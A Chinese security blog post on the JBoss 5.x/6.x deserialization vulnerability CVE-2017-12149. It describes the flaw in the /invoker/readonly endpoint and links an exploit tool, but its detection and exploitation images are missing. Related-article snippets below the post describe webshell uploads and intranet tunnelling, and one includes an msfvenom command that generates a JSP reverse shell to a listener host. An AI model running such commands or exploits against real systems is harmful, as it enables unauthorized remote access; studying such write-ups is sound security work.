JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

原創 tdcoming 2018-12-17 01:36

該漏洞爲 Java反序列化錯誤類型,存在於 Jboss 的 HttpInvoker 組件中的 ReadOnlyAccessFilter 過濾器中。該過濾器在沒有進行任何安全檢查的情況下嘗試將來自客戶端的數據流進行反序列化,從而導致了漏洞。

環境

JBoss 5.x/6.x 自行安裝
在這裏插入圖片描述

漏洞原理

該漏洞出現在/invoker/readonly請求中,服務器將用戶提交的POST內容進行了Java反序列化:
在這裏插入圖片描述

漏洞檢測和利用

檢測:
在這裏插入圖片描述
利用:
在這裏插入圖片描述
項目地址:
https://github.com/yunxu1/jboss-_CVE-2017-12149

參考鏈接:
https://github.com/yunxu1/jboss-_CVE-2017-12149
https://github.com/vulhub/vulhub/tr在這裏插入圖片描述ee/master/jboss/CVE-2017-12149

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

WEB安全——文件上傳

通過burpsuite抓包上傳webshell 先上傳正常圖片; 通過抓包獲得上傳頁面的url以及cookie; 通過明小子的綜合上傳功能上傳webshell;   IIS解析漏洞: 1.如果一個目錄以“xxx.asp”的形式命名,那麼該

gam0n 2020-07-08 11:53:40

白帽子學習筆記——瀏覽器安全

同源策略: 影響源的因素有host(域名或IP地址,如果是IP地址則看作一個根域名)、子域名、端口、協議; 在瀏覽器中,<script>,<img>,<iframe>,<link>等標籤都是可以跨域加載資源,不受同源策略影響, 這些帶"s

gam0n 2020-07-08 11:53:40

[GXYCTF2019]BabySQli

看了大佬的博客,勉強整出來了,詳細的寫一下我的思路。 錯誤思路: 觀察發現是post傳值,想用sqlmap一把嗦,BP抓包=>sqlmap 得到數據庫:web_sqli 表:user 字段:passwd 得到密碼是cdc9c81

imbia 2020-07-08 02:36:55

內網滲透(上)

每日一句: 做安全,有一定實力的話。找工作,待遇不好就不要去,不要委屈求全。 世界上好地方那麼多,不出去看看的話,你就以爲這就是世界 另外,二進制其實也不是多值錢的玩意,沒必要覺得多深奧 聲明: 內網滲透

划水的小白白 2020-07-08 00:37:05

CVE-2020-1938(RCE利用)

CVE-2020-1938(RCE利用) 1.使用msf生成反彈shell馬,並且監聽 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R >

陈玄都 2020-07-07 19:56:42

Apache Tomcat任意文件讀取漏洞POC測試(CVE-2020-1938)

Apache Tomcat任意文件讀取漏洞POC測試(CVE-2020-1938) 1.背景 Tomcat是由Apache軟件基金會屬下Jakarta項目開發的Servlet容器,按照Sun Microsystems提供的技術規範,實現了

陈玄都 2020-07-07 19:56:42

Apache Solr 遠程命令執行漏洞(CVE-2019-0193)

Apache Solr 遠程命令執行漏洞(CVE-2019-0193) 聲明:本篇文章僅限用於學習信息安全技術,請勿用於非法途徑! 1.漏洞描述 2019年8月1日,Apache Solr官方發佈了CVE-2019-0193漏洞預警,漏洞

陈玄都 2020-07-07 19:56:31

隱藏在圖片裏的後門

一、前言 本文原創作者:sucppVK,本文屬i春秋原創獎勵計劃,未經許可禁止轉載! 先說明三點:   這個後門就是一句話木馬這個不同於我們常說的圖片馬這個後門是過安全狗的 這個不算什麼新姿勢,只不過被提到的次數比較少 (各大論壇常見的

i春秋论坛 2020-07-07 05:14:23

PHP 限制訪問ip白名單

摘要: web系統經常會做到只允許內部服務器交互的情況,比如我的swoole機器與web機器交互.爲了安全,也爲了方便,我沒有做加密傳輸,而是簡單的做了ip白名單限制   一  上代碼   config.php //ip白名單配

布叔喂丶 2020-07-06 11:17:09

web安全之跨站腳本攻擊XSS與防範方法

跨站腳本攻擊(Cross Site Script爲了區別於CSS簡稱爲XSS)指的是惡意攻擊者往Web頁面裏插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web裏面的html代碼會被執行,從而達到惡意用戶的特殊目的。 一個簡單的留

Mark_Melon 2020-07-06 10:29:04

WEB程序防SQL注入攻擊程序

場景: WEB程序容易被SQL注入攻擊,攻擊原理是在請求參數中傳入非法字符,造成SQL語句出現出現異常情況,已達到攻擊者想要的結果。 分析: 一般的攻擊者都是在傳入的請求參數上做文章,所以我們重點檢查的是request的參數,判斷requ

成都好男人 2020-07-06 07:55:56

ApacheShiro1.2.4反序列化漏洞復現(CVE-2016-4437)

前言: Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。 影響版本: Apache Shiro <= 1.2.4 漏洞原理: Apache Sh

cj_hydra 2020-07-05 14:17:12

使用Ngrok來進行內網端口轉發

前言: 在學習了網絡安全之後,我們知道了公網和私網(內網),私網是不能直接在公網傳輸和通信的。比如一個學校,一個公司,都是單獨在自己的私網裏面,通過這個私網內部的路由器(NAPT方式)和外界通信。那麼如果A公司的員工要和B公司的員

cj_hydra 2020-07-05 14:17:12

phpMyAdmin(LOAD DATA INFILE) 任意文件讀取漏洞

phpMyAdmin開啓遠程登陸導致本地文件讀取 下面我們先去分析復現下這個漏洞。 $cfg['AllowArbitraryServer'] = true; //false改爲true 則登錄時就可以訪問遠程的服務器。當登陸一個

cj_hydra 2020-07-05 14:17:12

reGeorg+Proxifier實現http代理(windows下)

利用方式: 工具: reGeory 下載地址:https://github.com/sensepost/reGeorg Proxifier 下載地址:https://www.proxifier.com 第一步:將tunnel.no

cj_hydra 2020-07-05 14:17:12